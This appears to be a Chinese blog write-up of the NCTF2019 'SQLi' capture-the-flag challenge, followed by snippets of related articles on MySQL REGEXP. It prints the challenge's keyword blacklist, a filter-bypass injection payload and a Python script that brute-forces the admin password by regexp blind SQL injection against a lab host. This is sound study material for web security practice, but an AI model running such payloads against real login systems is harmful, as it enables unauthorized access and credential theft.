php sql中regexp,[NCTF2019]SQLi(regexp注入)

最新推荐文章于 2022-01-22 21:28:29 发布
最新推荐文章于 2022-01-22 21:28:29 发布
阅读量252 收藏
点赞数
文章标签: php sql中regexp

主页就一个登录框 。把sql语句显示出来了。

1580039005761.png

再进行一波信息搜集。看看robots.txt

有个hint.txt

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in||-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";

If $_POST['passwd'] === admin's password,

Then you will get the flag;

拿到flag的条件是post的密码要等于admin密码。并没有对用户名做限制

过滤了很多字符串。这里select字段被过滤了。但是没关系。mysql同一张表中的字段不需要select即可查询。这里只能用盲注。盲注还分时间盲注等。这里regexp即可绕过过滤

在Mysql种%00也是注释符。但是前面必须得加;

1b7c47273da35717dfce2aa92b84b92e.png

此时执行的sql语句为

select * from users where username='\' and passwd='||1;%00'

#where username='xxxx'||1

条件为真时。就会跳转。

条件为假时。就会回到登陆页

我们可以通过regexp来一位位判断密码

由于数据库中密码数据比较多。所以存在很多的密码

得一个个试。有那么多条数据。

9334a5072682bd8f2f7f0188f74709f1.png

最后y(79)开头的那条数据。比较特殊。开头三位是you

写个脚本爆破下这条数据

import requests

from urllib import parse

import string

import time

str1 = string.ascii_letters+'_'+string.digits

url='http://9d86404e-b5c0-41ff-b8ef-f9bbf6da8e8c.node3.buuoj.cn/index.php'

flag='79'

a=parse.unquote('%00')

for i in range(50):

for i in str1:

data={"username":"\\",

"passwd":"||passwd/**/regexp/**/0x"+flag+hex(ord(i)).replace('0x','')+";"+a

}

r=requests.post(url=url,data=data)

if 'welcome.php' in r.text:

flag+=hex(ord(i)).replace('0x','')

print(flag)

break

time.sleep(0.5)

#防止429

0eb013f238090e666ab20c9115cf3e78.png

用户名随意。密码填跑出来的密码。

因为flag条件为POST密码==admin密码即可。

47c73342bdc4601ea2a6f8879b5f15c5.png

又可乐
关注
MySQLREGEXP正则表达式使用大全
12-13
MySQL采用了扩展的版本,以支持在SQL语句REGEXP操作符一起使用的模式匹配操作。请参见3.3.4.7节,“模式匹配”。 在本附录,归纳了在MySQL可用于REGEXP操作的特殊字符和结构,并给出了一些示例。本附录未...
php sqlregexp,MySQL正则表达式 REGEXP详解
weixin_29513805的博客
03-22 485
在开始这个话题之前我们首先来做一个小实验,比较一下REGEXP和Like他们两个哪个效率高,如果效率太低,我们就没有必要做过多的研究了,实验的代码如下:Require("config.php");//函数:计时函数//用法:Echo Runtime(1);Function Runtime($mode=0){Static $s;IF(!$mode){$s=microtime();Return;}$e...
[NCTF2019]SQLi(Regexp注入
D.MIND 的博客
04-25 851
文章目录分析Regexp注入盲注脚本总结: 又是一道考验写python脚本的题目,python学的真不咋地,看师傅们的脚本才知道一些点改怎么写… 分析 查询语句: sqlquery : select * from users where username='' and passwd='' 一开始真的尝试很多感觉不好绕,后来意识到前面username处可以用反斜杠将SQL语句的单引号转义,再之后就没头绪了,因为实在过滤了很多,之后尝试了看看有没有hint信息,在robots.txt处找到,提示看hint.
REGEXP注入与LIKE注入学习笔记
qwzf
08-08 3793
首发于先知社区 0x00 前言 之前已经学过SQL盲注了,也见过盲注REGEXP注入,但没详细了解过。正好这次BJD遇到了这个,简单总结,并把题目复现一下。 0x01 注入原理 REGEXP注入,即regexp正则表达式注入REGEXP注入,又叫盲注值正则表达式攻击。 应用场景就是盲注,原理是直接查询自己需要的数据,然后通过正则表达式进行匹配。 0x02 REGEXP注入分析 1、基本注入 select (s...
使用MySQL正则表达式 __MySQL必知必会
weixin_30484247的博客
09-17 964
正则表达式作用是匹配方本,将一个模式(正则表达式)与一个文本串进行比较。 MySQL用WHERE子句对正则表达式提供了初步的支持,允许你指定用正则表达式过滤SELECT检索出的数据。 MySQL仅支持多数正则表达式实现的一个很小的子集。 ---------------------- 9.2.1 基本字符匹配 REGEXP后所跟的东西作为正则表达式处理。 代码 SELECT ...
老生常谈MYSQL模式匹配 REGEXP和like的用法
12-16
MySQL的模式匹配是数据库查询非常重要的功能,用于在数据搜索特定的字符串模式。主要有两种方式:`LIKE`和`REGEXP`。两者都用于筛选满足特定规则的数据,但它们在匹配规则上有所不同。 `LIKE`是SQL标准提供的...
JS正则RegExp对象对象
10-27
RegExp对象是JavaScript用于执行正则表达式相关操作和功能的内置对象。 首先,我们来看创建RegExp实例的两种方式。一种是使用显式构造函数,即new RegExp("pattern"[, "flags"])。这里的pattern参数是必须的,...
深入浅析JavaScriptRegExp对象
10-19
JavaScriptRegExp对象是用于处理正则表达式的内置对象,它提供了强大的文本匹配功能。正则表达式是一种描述字符串模式的语法,广泛应用于字符串查找、替换和分割等操作。JavaScript的正则表达式遵循Perl 5的规则...
php sqlregexp,SQlLIKE模糊查询与REGEXP用法
weixin_36401868的博客
03-22 792
文章详细的介绍了SQlLIKE模糊查询与REGEXP各种用法及对特殊字符的一些用法,有需要的朋友可参考一下。在搜索数据库的数据时,SQL 通配符可以替代一个或多个字符。SQL 通配符必须与 LIKE 运算符一起使用。在 SQL ,可使用以下通配符:通配符 描述% 替代一个或多个字符_ 仅替代一个字符[charlist] 字符列的任何单一字符[^charlist]或者[!charlist]不...
mysql正则REGEXP学习练习笔记
qq_15685651的专栏
10-05 734
REGEXP在mysql是用来执行正则表达式的一个函数,像php的preg之类的函数了,regexp正则函数如果只是简单的查询使用like即可,但复杂的还是需要使用regexp了,下面我们来看看。   MySql用户手册建议,在构造简单查询时,仍使用通配符。 如:Select [*|fieldname list] From [tablename] where [fi
tp5mysql使用REGEXP 正则匹配
读万卷书,行万里路
12-05 3860
tp5.0没有regexp,但是可以用exp表达式 sql正则表达式语句:select * fron 表名称 where name regexp 'ok$'; $result = model('表名称') ->where('idcard','exp','REGEXP \''."^{$idcardStart}\.{4}{$idcardEnd}$".'\...
php sqlregexp,php – 在mySQL regexp使用多个值
weixin_29800471的博客
03-22 240
我有一个问题:SELECT * from arrc_Voucher WHERE VoucherNbr REGEXP "^1002"这很有效 – VoucherNbr是一个16个字符的代码,此查询查找前四位数为1002的所有记录.现在我需要扩展它,我对正则表达式不是很好.我需要能够找到前四位数字是1002,1010,2015或3156的所有记录.如果这些是完整的数字,我只使用IN:SELECT *...
[NCTF2019]SQLi
Sk1y的博客
01-22 979
[NCTF2019]SQLi 文章目录[NCTF2019]SQLi一点记录参考链接 robots.txt有提示:hint.txt 查看hint.txt $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|ins
MYSQL GROUP_CONCAT 与REGEXP用法
wuyongde0922的专栏
02-21 3136
例如:select GROUP_CONCAT(cat_name) from buy_cat where cat_aid REGEXP prod_barcode MySQL数据库将多条记录的单个字段合并成一条记录的操作是本文我们主要要介绍的内容,接下来就让我们一起来了解一下这部分内容吧。 测试用表结构: CREATE TABLE IF NOT EXISTS `tet
BUU刷题-web
qq_46540840的博客
09-05 374
[NCTF2019]SQLi 访问robots.txt 发现hint $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i"; If $_POST['pas
[NCTF2019]SQLi:regexp正则注入
soldi_er的博客
05-18 8350
文章目录参考   登陆框。 给出后台查询语句sqlquery : select * from users where username='' and passwd=''。   信息搜集:手测黑名单 闭合黑名单:' 可用闭合:? 逻辑运算符黑名单:Or、And、Xor 可用逻辑运算符:||、&&、^。 注释符黑名单:#、--+、单引号闭合 可用注释符:;%00 空格黑名单:space、+ 可用替换符:/**/、%09等 关键词黑名单:Union 用户名黑名单:Adm
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值